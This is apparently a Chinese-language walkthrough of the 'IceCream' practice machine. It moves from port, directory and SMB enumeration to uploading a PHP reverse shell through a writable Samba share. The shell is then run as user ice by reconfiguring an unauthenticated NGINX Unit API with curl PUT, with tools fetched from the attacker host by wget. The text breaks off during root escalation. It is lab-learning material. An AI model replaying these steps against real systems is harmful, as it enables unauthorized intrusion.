![\"image-20241009145709859\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130144.png\")
<\/div>\n
![\"image-20241009151626781\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412131130146.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:139\nOpen 192.168.10.101:445\nOpen 192.168.10.101:9000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n| ssh-hostkey: \n| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOo0aMrFKUdos1+tMkValDaSFRx0lOy7VE4akDQlO9DGQDNT0aT5JCXm9jcgHk7mne7bxPG2jUBms8n2O1iQNyI=\n| 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDdtb0wbP+\/g4yk5RfteqQ3ho372gC6QdawREJ+y9Eb\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: 403 Forbidden\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-server-header: nginx\/1.22.1\n139\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open netbios-ssn syn-ack Samba smbd 4.6.2\n9000\/tcp open cslistener? syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 40\n| Connection: close\n| "error": "Value doesn't exist."\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 1042\n| Connection: close\n| "certificates": {},\n| "js_modules": {},\n| "config": {\n| "listeners": {},\n| "routes": [],\n| "applications": {}\n| "status": {\n| "modules": {\n| "python": {\n| "version": "3.11.2",\n| "lib": "\/usr\/lib\/unit\/modules\/python3.11.unit.so"\n| "php": {\n| "version": "8.2.18",\n| "lib": "\/usr\/lib\/unit\/modules\/php.unit.so"\n| "perl": {\n| "version": "5.36.0",\n| "lib": "\/usr\/lib\/unit\/modules\/perl.unit.so"\n| "ruby": {\n| "version": "3.1.2",\n| "lib": "\/usr\/lib\/unit\/modules\/ruby.unit.so"\n| "java": {\n| "version": "17.0.11",\n| "lib": "\/usr\/lib\/unit\/modules\/java17.unit.so"\n| "wasm": {\n| "version": "0.1",\n| "lib": "\/usr\/lib\/unit\/modules\/wasm.unit.so"\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Server: Unit\/1.33.0\n| Date: Wed, 09 Oct 2024 07:17:15 GMT\n| Content-Type: application\/json\n| Content-Length: 35\n| Connection: close\n|_ "error": "Invalid method."\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9000-TCP:V=7.94SVN%I=7%D=10\/9%Time=67062DF9%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,4A8,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Unit\/1\\.33\\.0\\r\\n\nSF:Date:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nContent-Type:\\\nSF:x20application\/json\\r\\nContent-Length:\\x201042\\r\\nConnection:\\x20close\\\nSF:r\\n\\r\\n{\\r\\n\\t\\"certificates\\":\\x20{},\\r\\n\\t\\"js_modules\\":\\x20{},\\r\\n\\\nSF:t\\"config\\":\\x20{\\r\\n\\t\\t\\"listeners\\":\\x20{},\\r\\n\\t\\t\\"routes\\":\\x20\\[\nSF:\\],\\r\\n\\t\\t\\"applications\\":\\x20{}\\r\\n\\t},\\r\\n\\r\\n\\t\\"status\\":\\x20{\\r\\\nSF:n\\t\\t\\"modules\\":\\x20{\\r\\n\\t\\t\\t\\"python\\":\\x20{\\r\\n\\t\\t\\t\\t\\"version\\"\nSF::\\x20\\"3\\.11\\.2\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/modules\/pytho\nSF:n3\\.11\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"php\\":\\x20{\\r\\n\\t\\t\\t\\t\\"\nSF:version\\":\\x20\\"8\\.2\\.18\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/modu\nSF:les\/php\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"perl\\":\\x20{\\r\\n\\t\\t\\t\\t\nSF:\\"version\\":\\x20\\"5\\.36\\.0\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/mo\nSF:dules\/perl\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"ruby\\":\\x20{\\r\\n\\t\\t\\\nSF:t\\t\\"version\\":\\x20\\"3\\.1\\.2\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/unit\/\nSF:modules\/ruby\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"java\\":\\x20{\\r\\n\\t\\\nSF:t\\t\\t\\"version\\":\\x20\\"17\\.0\\.11\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/u\nSF:nit\/modules\/java17\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t\\t\\"wasm\\":\\x20{\\\nSF:r\\n\\t\\t\\t\\t\\"version\\":\\x20\\"0\\.1\\",\\r\\n\\t\\t\\t\\t\\"lib\\":\\x20\\"\/usr\/lib\/\nSF:unit\/modules\/wasm\\.unit\\.so\\"\\r\\n\\t\\t\\t},\\r\\n\\r\\n\\t\\t")%r(HTTPOptions,C\nSF:7,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nServer:\\x20Unit\/1\\.3\nSF:3\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\nConten\nSF:t-Type:\\x20application\/json\\r\\nContent-Length:\\x2035\\r\\nConnection:\\x20\nSF:close\\r\\n\\r\\n{\\r\\n\\t\\"error\\":\\x20\\"Invalid\\x20method\\.\\"\\r\\n}\\r\\n")%r(\nSF:FourOhFourRequest,C3,"HTTP\/1\\.1\\x20404\\x20Not\\x20Found\\r\\nServer:\\x20Un\nSF:it\/1\\.33\\.0\\r\\nDate:\\x20Wed,\\x2009\\x20Oct\\x202024\\x2007:17:15\\x20GMT\\r\\\nSF:nContent-Type:\\x20application\/json\\r\\nContent-Length:\\x2040\\r\\nConnecti\nSF:on:\\x20close\\r\\n\\r\\n{\\r\\n\\t\\"error\\":\\x20\\"Value\\x20doesn't\\x20exist\\.\\\nSF:"\\r\\n}\\r\\n");\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled but not required\n| smb2-time: \n| date: 2024-10-09T07:17:16\n|_ start_date: N\/A\n|_clock-skew: 1s\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 16534\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 30933\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 19523\/udp): CLEAN (Failed to receive data)\n| Check 4 (port 16915\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\n| Names:\n| ICECREAM<00> Flags: <unique><active>\n| ICECREAM<03> Flags: <unique><active>\n| ICECREAM<20> Flags: <unique><active>\n| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>\n| WORKGROUP<00> Flags: <group><active>\n| WORKGROUP<1d> Flags: <unique><active>\n| WORKGROUP<1e> Flags: <group><active>\n| Statistics:\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.101\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 6988 \/ 441122 (1.58%)[ERROR] Get "http:\/\/192.168.10.101\/sed.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 23352 \/ 441122 (5.29%)[ERROR] Get "http:\/\/192.168.10.101\/Real_Estate": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.101\/growth.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.101\/2488": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 28289 \/ 441122 (6.41%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 28323 \/ 441122 (6.42%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.101 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx\/1.22.1], IP[192.168.10.101], Title[403 Forbidden], nginx[1.22.1]<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl http:\/\/192.168.10.101:9000\/\n{\n "certificates": {},\n "js_modules": {},\n "config": {\n "listeners": {},\n "routes": [],\n "applications": {}\n },\n\n "status": {\n "modules": {\n "python": {\n "version": "3.11.2",\n "lib": "\/usr\/lib\/unit\/modules\/python3.11.unit.so"\n },\n\n "php": {\n "version": "8.2.18",\n "lib": "\/usr\/lib\/unit\/modules\/php.unit.so"\n },\n\n "perl": {\n "version": "5.36.0",\n "lib": "\/usr\/lib\/unit\/modules\/perl.unit.so"\n },\n\n "ruby": {\n "version": "3.1.2",\n "lib": "\/usr\/lib\/unit\/modules\/ruby.unit.so"\n },\n\n "java": {\n "version": "17.0.11",\n "lib": "\/usr\/lib\/unit\/modules\/java17.unit.so"\n },\n\n "wasm": {\n "version": "0.1",\n "lib": "\/usr\/lib\/unit\/modules\/wasm.unit.so"\n },\n\n "wasm-wasi-component": {\n "version": "0.1",\n "lib": "\/usr\/lib\/unit\/modules\/wasm_wasi_component.unit.so"\n }\n },\n\n "connections": {\n "accepted": 0,\n "active": 0,\n "idle": 0,\n "closed": 0\n },\n\n "requests": {\n "total": 0\n },\n\n "applications": {}\n }\n}<\/code><\/pre>\n\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Wed Oct 9 03:21:44 2024\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n ICECREAM <00> - B <ACTIVE> Workstation Service\n ICECREAM <03> - B <ACTIVE> Messenger Service\n ICECREAM <20> - B <ACTIVE> File Server Service\n ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser\n WORKGROUP <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n WORKGROUP <1d> - B <ACTIVE> Master Browser\n WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections\n\n MAC Address = 00-00-00-00-00-00\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[+] Server 192.168.10.101 allows sessions using username '', password ''\n\n ===============================( Getting domain SID for 192.168.10.101 )===============================\n\nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n\n[+] Can't determine if host is part of domain or part of a workgroup\n\n ==================================( OS information on 192.168.10.101 )==================================\n\n[E] Can't get OS info with smbclient\n\n[+] Got OS info for 192.168.10.101 from srvinfo: \n ICECREAM Wk Sv PrQ Unx NT SNT Samba 4.17.12-Debian\n platform_id : 500\n os version : 6.1\n server type : 0x809a03\n\n ======================================( Users on 192.168.10.101 )======================================\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 972.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 975.\n\nUse of uninitialized value $users in print at .\/enum4linux.pl line 986.\nUse of uninitialized value $users in pattern match (m\/\/) at .\/enum4linux.pl line 988.\n\n ================================( Share Enumeration on 192.168.10.101 )================================\n\nsmbXcli_negprot_smb1_done: No compatible protocol selected by server.\n\n Sharename Type Comment\n --------- ---- -------\n print$ Disk Printer Drivers\n icecream Disk tmp Folder\n IPC$ IPC IPC Service (Samba 4.17.12-Debian)\n nobody Disk Home Directories\nReconnecting with SMB1 for workgroup listing.\nProtocol negotiation to server 192.168.10.101 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE\nUnable to connect with SMB1 -- no workgroup available\n\n[+] Attempting to map shares on 192.168.10.101\n\n\/\/192.168.10.101\/print$ Mapping: DENIED Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/icecream Mapping: OK Listing: OK Writing: N\/A\n\n[E] Can't understand response:\n\nNT_STATUS_CONNECTION_REFUSED listing \\*\n\/\/192.168.10.101\/IPC$ Mapping: N\/A Listing: N\/A Writing: N\/A\n\/\/192.168.10.101\/nobody Mapping: DENIED Listing: N\/A Writing: N\/A\n\n ===========================( Password Policy Information for 192.168.10.101 )===========================\n\n[+] Attaching to 192.168.10.101 using a NULL share\n\n[+] Trying protocol 139\/SMB...\n\n[+] Found domain(s):\n\n [+] ICECREAM\n [+] Builtin\n\n[+] Password Info for Domain: ICECREAM\n\n [+] Minimum password length: 5\n [+] Password history length: None\n [+] Maximum password age: 37 days 6 hours 21 minutes \n [+] Password Complexity Flags: 000000\n\n [+] Domain Refuse Password Change: 0\n [+] Domain Password Store Cleartext: 0\n [+] Domain Password Lockout Admins: 0\n [+] Domain Password No Clear Change: 0\n [+] Domain Password No Anon Change: 0\n [+] Domain Password Complex: 0\n\n [+] Minimum password age: None\n [+] Reset Account Lockout Counter: 30 minutes \n [+] Locked Account Duration: 30 minutes \n [+] Account Lockout Threshold: None\n [+] Forced Log off Time: 37 days 6 hours 21 minutes \n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 5\n\n ======================================( Groups on 192.168.10.101 )======================================\n\n[+] Getting builtin groups:\n\n[+] Getting builtin group memberships:\n\n[+] Getting local groups:\n\n[+] Getting local group memberships:\n\n[+] Getting domain groups:\n\n[+] Getting domain group memberships:\n\n =================( Users on 192.168.10.101 via RID cycling (RIDS: 500-550,1000-1050) )=================\n\n[I] Found new SID: \nS-1-22-1\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[+] Enumerating users using SID S-1-5-21-780586060-1811573838-1416508090 and logon username '', password ''\n\nS-1-5-21-780586060-1811573838-1416508090-501 ICECREAM\\nobody (Local User)\nS-1-5-21-780586060-1811573838-1416508090-513 ICECREAM\\None (Domain Group)\n\n[+] Enumerating users using SID S-1-5-32 and logon username '', password ''\n\nS-1-5-32-544 BUILTIN\\Administrators (Local Group)\nS-1-5-32-545 BUILTIN\\Users (Local Group)\nS-1-5-32-546 BUILTIN\\Guests (Local Group)\nS-1-5-32-547 BUILTIN\\Power Users (Local Group)\nS-1-5-32-548 BUILTIN\\Account Operators (Local Group)\nS-1-5-32-549 BUILTIN\\Server Operators (Local Group)\nS-1-5-32-550 BUILTIN\\Print Operators (Local Group)\n\n[+] Enumerating users using SID S-1-22-1 and logon username '', password ''\n\nS-1-22-1-1000 Unix User\\ice (Local User)\n\n ==============================( Getting printer info for 192.168.10.101 )==============================\n\nNo printers returned.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbmap -H $IP \n\n ________ ___ ___ _______ ___ ___ __ _______\n \/" )|" \\ \/" || _ "\\ |" \\ \/" | \/""\\ | __ "\\\n (: \\___\/ \\ \\ \/\/ |(. |_) :) \\ \\ \/\/ | \/ \\ (. |__) :)\n \\___ \\ \/\\ \\\/. ||: \\\/ \/\\ \\\/. | \/' \/\\ \\ |: ____\/\n __\/ \\ |: \\. |(| _ \\ |: \\. | \/\/ __' \\ (| \/\n \/" \\ :) |. \\ \/: ||: |_) :)|. \\ \/: | \/ \/ \\ \\ \/|__\/ \\\n (_______\/ |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/ \\___)(_______)\n -----------------------------------------------------------------------------\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s) \n\n[+] IP: 192.168.10.101:445 Name: lookup.hmv Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n print$ NO ACCESS Printer Drivers\n icecream READ, WRITE tmp Folder\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)\n nobody NO ACCESS Home Directories<\/code><\/pre>\n\u90fd\u663e\u793a\u6709\u4e00\u4e2a\u53ef\u8bfb\u5199\u76ee\u5f55\uff01\u524d\u9762\u7684\u57df\u540d\u89e3\u6790\u5fd8\u4e86\u5220\u6389\u4e86\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ nbtscan $IP \nDoing NBT name scan for addresses from 192.168.10.101\n\nIP address NetBIOS Name Server User MAC address \n------------------------------------------------------------------------------\n192.168.10.101 ICECREAM <server> ICECREAM 00:00:00:00:00:00<\/code><\/pre>\n\u4ee5\u53ca9000<\/code>\u7aef\u53e3\u7684\u6d4b\u8bd5\uff1a<\/p>\nhttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi<\/a><\/p>\n\u4ee5\u53ca https:\/\/gist.github.com\/phith0n\/9615e2420f31048f7e30f3937356cf75<\/a> <\/p>\n\u4f46\u662f\u672a\u679c\uff0c\u67e5\u8be2\u4e00\u4e0b\uff0c\u53d1\u73b0\u662f\uff1a<\/p>\n
![\"image-20241009154507241\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u767b\u5f55smb<\/h3>\n
\u767b\u5f55\u4ee5\u540e\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ vim revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ ls -la\ntotal 28\ndrwxr-xr-x 2 kali kali 4096 Oct 9 03:46 .\ndrwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..\n-rw-r--r-- 1 kali kali 8575 Oct 9 03:37 exp.py\n-rwxr-xr-x 1 kali kali 492 Oct 9 03:35 exp.sh\n-rw-r--r-- 1 kali kali 3912 Oct 9 03:46 revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ chmod +x revshell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ smbclient \/\/$IP\/ICECREAM -U ICECREAM\nPassword for [WORKGROUP\\ICECREAM]:\nTry "help" to get a list of possible commands.\nsmb: \\> dir\n . D 0 Wed Oct 9 03:39:01 2024\n .. D 0 Sun Oct 6 06:06:38 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024\n .font-unix DH 0 Wed Oct 9 03:15:48 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024\n .XIM-unix DH 0 Wed Oct 9 03:15:48 2024\n .ICE-unix DH 0 Wed Oct 9 03:15:48 2024\n .X11-unix DH 0 Wed Oct 9 03:15:48 2024\n\n 19480400 blocks of size 1024. 16156948 blocks available\nsmb: \\> pwd\nCurrent directory is \\\\192.168.10.101\\ICECREAM\\\nsmb: \\> help\n? allinfo altname archive backup \nblocksize cancel case_sensitive cd chmod \nchown close del deltree dir \ndu echo exit get getfacl \ngeteas hardlink help history iosize \nlcd link lock lowercase ls \nl mask md mget mkdir \nmore mput newer notify open \nposix posix_encrypt posix_open posix_mkdir posix_rmdir \nposix_unlink posix_whoami print prompt put \npwd q queue quit readlink \nrd recurse reget rename reput \nrm rmdir showacls setea setmode \nscopy stat symlink tar tarmode \ntimeout translate unlock volume vuid \nwdel logon listconnect showconnect tcon \ntdis tid utimes logoff .. \n! \nsmb: \\> put revshell.php \nputting file revshell.php as \\revshell.php (764.0 kb\/s) (average 764.1 kb\/s)\nsmb: \\> ls\n . D 0 Wed Oct 9 03:47:43 2024\n .. D 0 Sun Oct 6 06:06:38 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-logind.service-fuqSuC D 0 Wed Oct 9 03:15:49 2024\n .font-unix DH 0 Wed Oct 9 03:15:48 2024\n systemd-private-04c229acaa5c413b8608357c75eae31f-systemd-timesyncd.service-UeLq7f D 0 Wed Oct 9 03:15:48 2024\n .XIM-unix DH 0 Wed Oct 9 03:15:48 2024\n .ICE-unix DH 0 Wed Oct 9 03:15:48 2024\n .X11-unix DH 0 Wed Oct 9 03:15:48 2024\n revshell.php A 3912 Wed Oct 9 03:47:43 2024\n\n 19480400 blocks of size 1024. 16156944 blocks available<\/code><\/pre>\n\u7136\u540e\u8bbf\u95ee\u6fc0\u6d3b\u4e00\u4e0b\u5373\u53ef\uff01<\/p>\n
http:\/\/192.168.10.101\/revshell.php<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@icecream:\/$ cd \/var\/tmp\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/linpeas.sh\n(remote) www-data@icecream:\/var\/tmp$ wget http:\/\/192.168.10.102:8888\/pspy64\n(remote) www-data@icecream:\/var\/tmp$ chmod +x *<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u6dfb\u52a0\u8def\u7531\u76d1\u542c\u63d0\u6743ice<\/h3>\n
Todd<\/code>\u5e08\u5085\u627e\u5230\u4e86\u4e00\u4e2a\u52a0\u8def\u7531\u7684\u529e\u6cd5\uff01\u5c1d\u8bd5\u6309\u56fe\u7d22\u9aa5\u4e00\u4e0b\uff01<\/p>\n<\/div><\/p>\n\u53d1\u73b0\u5b58\u5728\u4f7f\u7528PUT\u8fdb\u884c\u66f4\u65b0\u7684\u529e\u6cd5\uff1a<\/p>\n
<\/div><\/p>\n\u6839\u636e\u5b98\u7f51\u4e0b\u9762\u7684\u6837\u4f8b\uff0c\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\u4e0a\u4f20\uff1a<\/p>\n
{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "share": "\/tmp\/revshell.php",\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "user": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u7136\u540e\u62a5\u9519\u4e86\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u73b0\u5c1d\u8bd5\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u5148\u4f7f\u7528\u4e4b\u524d\u7684\u6743\u9650\u5199\u5165\u7684shell\uff0c\u518d\u4f20\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
<\/div><\/p>\n{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "user": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n "error": "Invalid configuration.",\n "detail": "Required parameter \\"root\\" is missing."\n}<\/code><\/pre>\n\u518d\u6b21\u4fee\u6539\uff1a<\/p>\n
{\n "listeners": {\n "127.0.0.1:8080": {\n "pass": "routes"\n }\n },\n\n "routes": [\n {\n "action": {\n "pass": "applications\/shellapp"\n }\n }\n ],\n "applications": {\n "shellapp": {\n "type": "php",\n "root": "\/tmp",\n "index": "revshell.php",\n "script": "revshell.php"\n }\n }\n}<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/IceCream]\n\u2514\u2500$ curl -X PUT --data-binary @shell.json http:\/\/192.168.10.102:9000\/config\n{\n "success": "Reconfiguration done."\n}<\/code><\/pre>\n\u7136\u540e\u65e0\u6cd5\u8bbf\u95ee\uff0c\u91cd\u542f\uff0c\u91cd\u65b0\u4e0a\u4f20shell\uff0c\u8c03\u6574\u4e86\u4e00\u4e0b\uff0c\u62ff\u4e0buser\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u662f\u5565\uff1a<\/p>\n
\nUSB Mass Storage to Network Proxy (ums2net)<\/h1>\n
ums2net provides a way for a user to connect from a network connection to a USB mass storage device.<\/p>\n
Build<\/h2>\n\n- cmake .<\/li>\n
- make<\/li>\n<\/ol>\n
How to use ums2net<\/h2>\n\n- Insert the USB Mass Storage. Check \/dev\/disk\/by-id\/ for the unique path for that device.<\/li>\n
- Create a config file base on the above path. Please see the config file format section.<\/li>\n
- Run "ums2net -c ". ums2net will become a daemon in the background. For debugging please add "-d" option to avoid detach.<\/li>\n
- Use nc to write your image to the USB Mass Storage device. For example, "nc -N localhost 29543 < warp7.img"<\/li>\n<\/ol>\n
Config file<\/h2>\n
